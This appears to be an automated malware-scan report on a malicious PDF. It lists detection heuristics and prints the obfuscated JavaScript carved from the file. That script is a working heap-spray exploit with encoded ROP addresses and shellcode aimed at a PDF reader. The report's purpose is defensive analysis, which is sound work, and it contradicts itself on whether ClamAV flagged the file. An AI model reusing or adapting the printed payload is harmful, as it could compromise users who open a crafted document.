Verdict: MALICIOUS
Risk Score: 178

Machine Learning
- Nyx PDF Classifier malicious score 0.9401
Heuristics (7)
- ClamAV: Heuristics.PDF.ObfuscatedNameObject (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Heuristics.PDF.ObfuscatedNameObject
- Hex-obfuscated scripting name object (critical, PDF_OBFUSCATED_NAME_OBJECT): A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners, e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
- JavaScript action (low, 1 related finding, PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream (low, PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- XFA form (low, PDF_XFA): PDF uses XML Forms Architecture, which can contain script logic.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xdp/ (in PDF document text)
  - http://www.xfa.org/schema/xci/2.6/ (in PDF document text)
  - http://www.xfa.org/schema/xfa-template/2.6/ (in PDF document text)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0012_000.js | pdf-javascript-stream | PDF /JS object 12 at offset 0xA1E0 | 3807 bytes |

SHA-256: 4f1c7e5fe610d6bd2644ee784607b7ac5a925605fa5d8c84a62a0bf1c7a7e2b3

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 8 of 12 identifiers look randomly generated (e.g. 'GIIPpeoPDhKvWPkGCbSooXEXquGhwynguwFIIsQi'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
```javascript
var KTegdppZJAMakPDGSHJcnPiaalFoIfNVBANmUsIjnwIgzOuOGEMSucfMAbpxtJSyOFRrQkZHwt = unescape;
var sSXcnPRQIJenlYcVoIPLVzJYIOKMwfzwNmLrEgoEItvQZsqaBAdcffbdatyeptSABDjkhbbqlGOotwUbMUEyR = KTegdppZJAMakPDGSHJcnPiaalFoIfNVBANmUsIjnwIgzOuOGEMSucfMAbpxtJSyOFRrQkZHwt( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc0db%u74d9%uf424%uf5ba%u3362%u5ee4%uc92b%u64b1%uc683%u3104%u1356%ua303%ud171%ub711%u9a9e%u47da%uc55f%u95eb%ue0d6%u9268%udabb%uf6fb%u9037%ue2ae%u5976%u78c5%uaa51%u366d%u8587%u6a51%u84fb%u702d%u6728%ubb0f%u663d%u0a48%u874b%udb04%u0538%u68b9%u967c%ubeb8%ua60a%ubbc2%u53cd%uc27f%u101d%ue427%uf49c%uac53%uaa86%ue5e6%u76c3%u7ea0%u0c1f%u7f03%uc461%ubf55%u29ce%u325a%u6d0e%uac5d%u8565%u519d%u5e7e%u8ddf%u410b%u4647%ua5ab%u8b79%u2d2a%u6075%u6938%u779a%u01ed%ufca6%uc610%u462e%uc237%u1d6b%u5356%uf0d6%u8367%uadbe%ucfcd%ub82d%u3072%uc5ae%ua72e%u5c3f%u37a5%ue9a8%u562c%u4141%ueac7%u4fe6%u0c10%ubedd%ua1c5%u938d%u16aa%u295a%ue01b%ub23d%u4176%u2611%u357a%udec6%ub8c7%u1ee8%u0bd0%u1ee8%u4320%u7aad%ueb7a%ue649%u5c1d%udfc3%u3897%u6b8c%ud731%ud621%u7f88%uafff%uc95f%u1eb4%ua42e%ua01c%u5efe%u29f6%u5861%ufc07%ua317%u96ab%u1e27%ue2a4%u0d7b%ubd67%ue728%uaaef%u299a%ud3cb%ua0f0%u2141%ua4a4%u0615%u355a%u889f%u3130%u22cf%u6fda%uc787%u11a2%ud8d1%u7dfe%u758d%ud452%u5459%uc052%u59e2%u758f%ud0d4%u1e26%u095d%ude47%u6935%uebb7%u8e25%u5be2%ubdd3%u9465%u9fae%uab20%ub504%u3b8c%u59a7%ubc0d%u59cf%ufc0d%u0a0f%ua465%uffab%uab90%u6c61%u0709%u7503%ucff9%u5913%u1006%ucf47%u026e%u66f1%udd8c%ufd28%u5691%u761e%u9616%u0d63%uedd9%u5586%u5219%u0ca1%u9262%uffce%u5fa5%uce1f%ua7e3%u0271%ue83c%u53a3%u3d0f%u41bc' );
var KyNgDYokohEuvzgg = KTegdppZJAMakPDGSHJcnPiaalFoIfNVBANmUsIjnwIgzOuOGEMSucfMAbpxtJSyOFRrQkZHwt( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (KyNgDYokohEuvzgg.length + 20 + 8 < 65536) KyNgDYokohEuvzgg+=KyNgDYokohEuvzgg;
HyTKIorSxQPxSVpSKb = KyNgDYokohEuvzgg.substring(0, (0x0c0c-0x24)/2);
HyTKIorSxQPxSVpSKb += sSXcnPRQIJenlYcVoIPLVzJYIOKMwfzwNmLrEgoEItvQZsqaBAdcffbdatyeptSABDjkhbbqlGOotwUbMUEyR;
HyTKIorSxQPxSVpSKb += KyNgDYokohEuvzgg;
xjPQdlUsOKNwIMzCJtTSXzUuwlqFXiZaPDoPPfOjnm = HyTKIorSxQPxSVpSKb.substring(0, 65536/2);
while(xjPQdlUsOKNwIMzCJtTSXzUuwlqFXiZaPDoPPfOjnm.length < 0x80000) xjPQdlUsOKNwIMzCJtTSXzUuwlqFXiZaPDoPPfOjnm += xjPQdlUsOKNwIMzCJtTSXzUuwlqFXiZaPDoPPfOjnm;
GIIPpeoPDhKvWPkGCbSooXEXquGhwynguwFIIsQidiSblcUZMtDdWxDpDTrepwGsYXiGXsjLYDpWdozhvXAcfcIKbHSYunSZzxh = xjPQdlUsOKNwIMzCJtTSXzUuwlqFXiZaPDoPPfOjnm.substring(0, 0x80000 - (0x1020-0x08) / 2);
var dysPaZlPXCmqcVycmpAOGyZPUBvzPSZGjAsGGMLbyFxbGqTMNveAyMPsatdgcpBBQmaiZfJTffYw = new Array();
for (olQjHftCDYFSKOqtEY=0;olQjHftCDYFSKOqtEY<0x1f0;olQjHftCDYFSKOqtEY++) dysPaZlPXCmqcVycmpAOGyZPUBvzPSZGjAsGGMLbyFxbGqTMNveAyMPsatdgcpBBQmaiZfJTffYw[olQjHftCDYFSKOqtEY]=GIIPpeoPDhKvWPkGCbSooXEXquGhwynguwFIIsQidiSblcUZMtDdWxDpDTrepwGsYXiGXsjLYDpWdozhvXAcfcIKbHSYunSZzxh+"s";
```